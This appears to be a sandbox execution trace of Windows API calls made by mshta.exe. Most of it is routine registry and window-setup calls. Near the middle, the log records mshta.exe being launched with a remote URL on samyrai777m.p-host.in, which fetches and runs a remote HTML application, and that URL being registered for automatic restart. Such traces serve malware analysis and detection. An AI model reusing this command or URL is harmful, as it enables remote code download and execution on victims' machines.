[0063.391] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x78) returned 0x0
[0063.391] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x7c) returned 0x0
[0063.391] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.391] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.391] RegCloseKey (hKey=0x0) returned 0x6
[0063.391] RegCloseKey (hKey=0x0) returned 0x6
[0063.391] RegCloseKey (hKey=0x78) returned 0x0
[0063.391] RegCloseKey (hKey=0x7c) returned 0x0
[0063.391] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x7c) returned 0x0
[0063.391] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x78) returned 0x0
[0063.391] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.391] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.391] RegCloseKey (hKey=0x0) returned 0x6
[0063.391] RegCloseKey (hKey=0x0) returned 0x6
[0063.391] RegCloseKey (hKey=0x7c) returned 0x0
[0063.391] RegCloseKey (hKey=0x78) returned 0x0
[0063.391] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x78) returned 0x0
[0063.391] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x7c) returned 0x0
[0063.391] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.391] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.391] RegCloseKey (hKey=0x0) returned 0x6
[0063.391] RegCloseKey (hKey=0x0) returned 0x6
[0063.391] RegCloseKey (hKey=0x78) returned 0x0
[0063.392] RegCloseKey (hKey=0x7c) returned 0x0
[0063.392] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x7c) returned 0x0
[0063.392] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x78) returned 0x0
[0063.392] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.392] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.392] RegCloseKey (hKey=0x0) returned 0x6
[0063.392] RegCloseKey (hKey=0x0) returned 0x6
[0063.392] RegCloseKey (hKey=0x7c) returned 0x0
[0063.392] RegCloseKey (hKey=0x78) returned 0x0
[0063.392] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0063.392] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x7c) returned 0x0
[0063.392] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x80) returned 0x0
[0063.392] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.393] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.393] RegCloseKey (hKey=0x0) returned 0x6
[0063.393] RegCloseKey (hKey=0x0) returned 0x6
[0063.393] RegCloseKey (hKey=0x7c) returned 0x0
[0063.393] RegCloseKey (hKey=0x80) returned 0x0
[0063.393] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x80) returned 0x0
[0063.393] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x7c) returned 0x0
[0063.393] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.393] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.393] RegCloseKey (hKey=0x0) returned 0x6
[0063.393] RegCloseKey (hKey=0x0) returned 0x6
[0063.393] RegCloseKey (hKey=0x80) returned 0x0
[0063.393] RegCloseKey (hKey=0x7c) returned 0x0
[0063.393] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed58 | out: phkResult=0x14ed58*=0x7c) returned 0x0
[0063.393] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed60 | out: phkResult=0x14ed60*=0x80) returned 0x0
[0063.393] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.393] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x14ece8 | out: phkResult=0x14ece8*=0x0) returned 0x2
[0063.393] RegCloseKey (hKey=0x0) returned 0x6
[0063.393] RegCloseKey (hKey=0x0) returned 0x6
[0063.393] RegCloseKey (hKey=0x7c) returned 0x0
[0063.393] RegCloseKey (hKey=0x80) returned 0x0
[0063.393] GetSystemMetrics (nIndex=68) returned 4
[0063.393] GetSystemMetrics (nIndex=69) returned 4
[0063.393] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14
[0063.394] GetSystemDefaultLCID () returned 0x409
[0063.394] GetVersionExW (in: lpVersionInformation=0x14ed50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14ed50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0063.394] GetUserDefaultUILanguage () returned 0x409
[0063.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x14ebf0, cchData=16 | out: lpLCData="\x03") returned 16
[0063.395] GetKeyboardLayoutList (in: nBuff=32, lpList=0x14ec50 | out: lpList=0x14ec50) returned 1
[0063.395] GetSystemMetrics (nIndex=4096) returned 0
[0063.396] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14edb8 | out: phkResult=0x14edb8*=0x80) returned 0x0
[0063.396] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14edc0 | out: phkResult=0x14edc0*=0x7c) returned 0x0
[0063.396] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed48 | out: phkResult=0x14ed48*=0x0) returned 0x2
[0063.396] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ed48 | out: phkResult=0x14ed48*=0x0) returned 0x2
[0063.396] RegCloseKey (hKey=0x0) returned 0x6
[0063.396] RegCloseKey (hKey=0x0) returned 0x6
[0063.396] RegCloseKey (hKey=0x80) returned 0x0
[0063.396] RegCloseKey (hKey=0x7c) returned 0x0
[0063.396] GetModuleFileNameW (in: hModule=0x7fee0880000, lpFilename=0x14ec60, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll")) returned 0x1e
[0063.396] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a
[0063.396] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b
[0063.396] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d
[0063.396] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f
[0063.396] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e
[0063.396] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc194
[0063.396] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc195
[0063.396] GetDC (hWnd=0x0) returned 0x80108d2
[0063.396] SHCreateShellPalette (hdc=0x0) returned 0x90808d9
[0063.396] GetPaletteEntries (in: hpal=0x90808d9, iStart=0x0, cEntries=0x100, pPalEntries=0x7fee1043224 | out: pPalEntries=0x7fee1043224) returned 0x100
[0063.396] SHGetInverseCMAP (in: pbMap=0x7fee1046308, cbMap=0x8 | out: pbMap=0x7fee1046308) returned 0x0
[0063.396] GetDeviceCaps (hdc=0x80108d2, index=38) returned 32409
[0063.396] ReleaseDC (hWnd=0x0, hDC=0x80108d2) returned 1
[0063.397] GetCurrentProcessId () returned 0xbc8
[0063.397] _vsnprintf (in: _DstBuf=0x14f000, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x14eea8 | out: _DstBuf="#MSHTML#PERF#00000BC8") returned 21
[0063.397] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000BC8") returned 0x0
[0063.397] GetVersionExW (in: lpVersionInformation=0x14eee0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x10, dwBuildNumber=0x0, dwPlatformId=0x14efe8, szCSDVersion="") | out: lpVersionInformation=0x14eee0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0063.397] GetModuleHandleW (lpModuleName="advapi32") returned 0x7feff8e0000
[0063.397] GetProcAddress (hModule=0x7feff8e0000, lpProcName="EventWrite") returned 0x7782b510
[0063.397] GetProcAddress (hModule=0x7feff8e0000, lpProcName="EventRegister") returned 0x7783cac0
[0063.397] GetProcAddress (hModule=0x7feff8e0000, lpProcName="EventUnregister") returned 0x77823c80
[0063.397] EtwEventRegister (in: ProviderId=0x7fee0ef0280, EnableCallback=0x7fee08843a0, CallbackContext=0x7fee1046310, RegHandle=0x7fee1044960 | out: RegHandle=0x7fee1044960) returned 0x0
[0063.397] EtwRegisterTraceGuidsW () returned 0x0
[0063.397] EtwRegisterTraceGuidsW () returned 0x0
[0063.397] EtwEventRegister (in: ProviderId=0x7fee0ef0290, EnableCallback=0x7fee08843a0, CallbackContext=0x7fee10464c0, RegHandle=0x7fee1044968 | out: RegHandle=0x7fee1044968) returned 0x0
[0063.398] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Root\\Office16\\outllib.dll", lpdwHandle=0x14ec54 | out: lpdwHandle=0x14ec54) returned 0x0
[0063.398] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000
[0063.398] GetModuleFileNameW (in: hModule=0xff9d0000, lpFilename=0x14ec60, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0063.398] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe"
[0063.411] GetCurrentProcessId () returned 0xbc8
[0063.411] GetCurrentProcessId () returned 0xbc8
[0063.428] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0x9c
[0063.428] GetLastError () returned 0xb7
[0063.428] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xa0
[0063.428] MapViewOfFile (hFileMappingObject=0xa0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x200000
[0063.440] RegCloseKey (hKey=0x2a) returned 0x0
[0063.440] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x776e0000
[0063.440] GetProcAddress (hModule=0x776e0000, lpProcName="RegisterApplicationRestart") returned 0x7775f510
[0063.440] lstrlenA (lpString="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 49
[0063.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2d2f40, cbMultiByte=-1, lpWideCharStr=0x635d40, cchWideChar=50 | out: lpWideCharStr="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 50
[0063.440] RegisterApplicationRestart (pwzCommandline="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x0) returned 0x0
[0063.441] GetProcAddress (hModule=0x7fee0880000, lpProcName="RunHTMLApplication") returned 0x7fee0ad5b90
[0063.462] GetCommandLineW () returned="\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0"
[0063.479] OleInitialize (pvReserved=0x0) returned 0x0
[0063.496] IsWindow (hWnd=0x0) returned 0
[0063.496] RegisterClassW (lpWndClass=0x14f830) returned 0xc196
[0063.496] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xff9d0000, lpParam=0x7fee10426a0) returned 0x101fc
[0063.500] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x101fc, hMenu=0x0, hInstance=0xff9d0000, lpParam=0x7fee10426a0) returned 0x10200
[0063.500] SetWindowLongW (hWnd=0x10200, nIndex=-16, dwNewLong=-2100363264) returned 114229248
[0063.501] SetWindowPos (hWnd=0x10200, hWndInsertAfter=0xfffffffffffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0063.501] SendMessageW (hWnd=0x10200, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0
[0063.502] PathRemoveArgsW (in: pszPath="http://www.samyrai777m.p-host.in/t/t.php?thread=0" | out: pszPath="http://www.samyrai777m.p-host.in/t/t.php?thread=0")
[0063.502] PathRemoveBlanksW (in: pszPath="http://www.samyrai777m.p-host.in/t/t.php?thread=0" | out: pszPath="http://www.samyrai777m.p-host.in/t/t.php?thread=0")
[0063.502] PathUnquoteSpacesW (in: lpsz="http://www.samyrai777m.p-host.in/t/t.php?thread=0" | out: lpsz="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0
[0063.502] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppmk=0x14f940*=0x0, dwFlags=0x1 | out: ppmk=0x14f940*=0x2f5140) returned 0x0
[0063.569] CoCreateInstance (in: rclsid=0x7fee0ef0cf0*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee0f4de80*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7fee1042738 | out: ppv=0x7fee1042738*=0x31d790) returned 0x0
[0063.577] GetCurrentThreadId () returned 0xbcc
[0063.584] RegisterClassExW (param_1=0x14e310) returned 0xc197
[0063.584] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc197, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x7fee0880000, lpParam=0x0) returned 0x10204
[0063.585] GetWindowLongW (hWnd=0x10204, nIndex=-20) returned 0
[0063.585] NtdllDefWindowProc_W () returned 0x1
[0063.586] NtdllDefWindowProc_W () returned 0x0
[0063.586] NtdllDefWindowProc_W () returned 0x0
[0063.586] NtdllDefWindowProc_W () returned 0x0
[0063.586] NtdllDefWindowProc_W () returned 0x0
[0063.586] CreateCompatibleDC (hdc=0x0) returned 0x7c01077d
[0063.586] GetDeviceCaps (hdc=0x7c01077d, index=90) returned 96
[0063.586] GetDeviceCaps (hdc=0x7c01077d, index=88) returned 96
[0063.586] GetSystemMetrics (nIndex=68) returned 4
[0063.587] GetSystemMetrics (nIndex=69) returned 4
[0063.587] GetSystemMetrics (nIndex=2) returned 17
[0063.587] GetSystemMetrics (nIndex=3) returned 17
[0063.587] GetStockObject (i=13) returned 0x18a002e
[0063.587] SelectObject (hdc=0x7c01077d, h=0x18a002e) returned 0x18a002e
[0063.587] GetTextMetricsW (in: hdc=0x7c01077d, lptm=0x14e450 | out: lptm=0x14e450) returned 1
[0063.587] SelectObject (hdc=0x7c01077d, h=0x18a002e) returned 0x18a002e
[0063.587] DeleteObject (ho=0x18a002e) returned 1
[0063.587] GetSystemDefaultLCID () returned 0x409
[0063.587] GetUserDefaultLCID () returned 0x409
[0063.587] GetACP () returned 0x4e4
[0063.587] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x14e3a0, cchData=41 | out: lpLCData="1") returned 2
[0063.587] _wtoi (_String="1") returned 1
[0063.587] RegCloseKey (hKey=0x0) returned 0x6
[0063.587] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x14e380, cchData=16 | out: lpLCData="0123456789") returned 11
[0063.587] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7fee10469c4, fWinIni=0x0 | out: pvParam=0x7fee10469c4) returned 1
[0063.587] SystemParametersInfoW (in: uiAction=0x42, uiParam=0x10, pvParam=0x14e440, fWinIni=0x0 | out: pvParam=0x14e440) returned 1
[0063.587] GetSystemWindowsDirectoryW (in: lpBuffer=0x14e270, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa
[0063.587] lstrlenW (lpString="C:\\Windows") returned 10
[0063.587] lstrlenW (lpString="\\WindowsShell.manifest") returned 22
[0063.587] CreateActCtxW (pActCtx=0x14e230) returned 0x31b918
[0063.588] ActivateActCtx (in: hActCtx=0x31b918, lpCookie=0x14e1e8 | out: hActCtx=0x31b918, lpCookie=0x14e1e8) returned 1
[0063.588] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x7fefc060000
[0063.592] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1001f13100000001) returned 1
[0063.592] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb
[0063.592] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32
[0063.592] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8
[0063.592] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32
[0063.592] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e3d0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0063.592] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14e0b0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0063.592] GetCurrentProcess () returned 0xffffffffffffffff
[0063.592] GetModuleBaseNameW (in: hProcess=0xffffffffffffffff, hModule=0x0, lpBaseName=0x14dea0, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9
[0063.592] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe"
[0063.592] FindAtomW (lpString="TridentEnableHiRes") returned 0x0
[0063.593] SHGetValueW (in: hkey=0xffffffff80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x14de98, pvData=0x14de94, pcbData=0x14de90*=0x4 | out: pdwType=0x14de98*=0x0, pvData=0x14de94, pcbData=0x14de90*=0x4) returned 0x2
[0063.593] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14dd88 | out: phkResult=0x14dd88*=0x1cc) returned 0x0
[0063.593] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14dd90 | out: phkResult=0x14dd90*=0x1c8) returned 0x0
[0063.593] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x14dd18 | out: phkResult=0x14dd18*=0x0) returned 0x2
[0063.593] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x14dd18 | out: phkResult=0x14dd18*=0x0) returned 0x2
[0063.593] RegCloseKey (hKey=0x0) returned 0x6
[0063.593] RegCloseKey (hKey=0x0) returned 0x6
[0063.593] RegCloseKey (hKey=0x1cc) returned 0x0
[0063.593] RegCloseKey (hKey=0x1c8) returned 0x0
[0063.593] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0063.593] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0063.593] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0063.593] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0063.593] GetCurrentThreadId () returned 0xbcc
[0063.593] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc198
[0063.616] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1
[0063.616] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x7fee10448f8, dwReserved=0x0 | out: ppSM=0x7fee10448f8*=0x31ed90) returned 0x0
[0063.619] GetCurrentThreadId () returned 0xbcc
[0063.619] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x14e120 | out: ppURI=0x14e120*=0x30d5a0) returned 0x0
[0063.619] IUri:GetPropertyDWORD (in: This=0x30d5a0, uriProp=0x11, pdwProperty=0x14e118, dwFlags=0x0 | out: pdwProperty=0x14e118*=0x11) returned 0x0
[0063.619] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x31e1a8, dwReserved=0x0 | out: ppSM=0x31e1a8*=0x3212c0) returned 0x0
[0063.619] IInternetSecurityManager:SetSecuritySite (This=0x3212c0, pSite=0x31e1b8) returned 0x0
[0063.619] IUnknown:AddRef (This=0x31e1b8) returned 0x28
[0063.619] IUnknown:QueryInterface (in: This=0x31e1b8, riid=0x7fefe4ae970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x14e070 | out: ppvObject=0x14e070*=0x31e1c0) returned 0x0
[0063.619] IServiceProvider:QueryService (in: This=0x31e1c0, guidService=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x321308 | out: ppvObject=0x321308*=0x0) returned 0x80004002
[0063.630] IServiceProvider:QueryService (in: This=0x31e1c0, guidService=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x321300 | out: ppvObject=0x321300*=0x0) returned 0x80004002
[0063.630] IServiceProvider:QueryService (in: This=0x31e1c0, guidService=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x3212f8 | out: ppvObject=0x3212f8*=0x0) returned 0x80004002
[0063.630] IUnknown:Release (This=0x31e1c0) returned 0x0
[0063.630] IInternetSecurityManager:GetSecurityId (in: This=0x3212c0, pwszUrl="about:blank", pbSecurityId=0x14e1d0, pcbSecurityId=0x14e1c0*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14e1d0*=0x61, pcbSecurityId=0x14e1c0*=0xf) returned 0x0
[0063.637] DllGetClassObject (in: rclsid=0x319c80*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x14d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14c550 | out: ppv=0x14c550*=0x7fee1044fa0) returned 0x0
